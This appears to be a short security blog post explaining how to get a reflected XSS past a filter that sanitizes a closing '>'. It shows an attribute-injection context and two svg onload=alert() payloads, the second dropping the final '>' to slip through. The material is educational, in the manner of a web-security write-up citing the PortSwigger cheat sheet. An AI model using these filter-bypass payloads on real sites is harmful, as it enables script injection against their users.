XSS Bypass Closing Tag ">" Filtered


This time I try to continue the previous findings with some of my opinion and reference findings 🙂

Response code snippet:

<h1 test="x" value="[INPUT]">

From the responses above, it can be seen that the client input will enter the value.

Let's start this off with some payload input:

1. "><svg onload=alert()>

If you enter the payload above, then the response will be:

<h1 test="x" value="["><svg onload=alert()>]">

If you enter a payload like that, then XSS is triggered, but it's not that easy if you find XSS on a big site, surely they will sanitize your input. And I took a sample of the responses from that input which was sanitized to be:

<h1 test="x" value="["&gt;]">

Look, why be &quot;&gt; ?

Yes it is sanitized, because there is potential HTML there and (value="[INPUT]") If you add "><tag> then your input ( "><> ) will be sanitized to &quot;&gt;

Then what is the solution?

2. "><svg onload=alert()

Surely you ask, why the payload?
Isn't that the same as number 1?
Let's see your input responses:

<h1 test="x" value="["><svg onload=alert()]">

See not sanitized 🙂

Why not sanitize?

Let's see again, there are contents of the tag you input without greater than. And back to my previous explanation that the input is sanitized if any potential HTML is entered.

There is no HTML potential in the client input, right?

And see the XSS you get here 🙂

There is an interesting thing that I got from the reference made by the PortSwigger team here, namely XSS without greater than .

References :

https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Here's a snippet:

<h1>

"><svg onload=alert()

</h1>

XSS triggered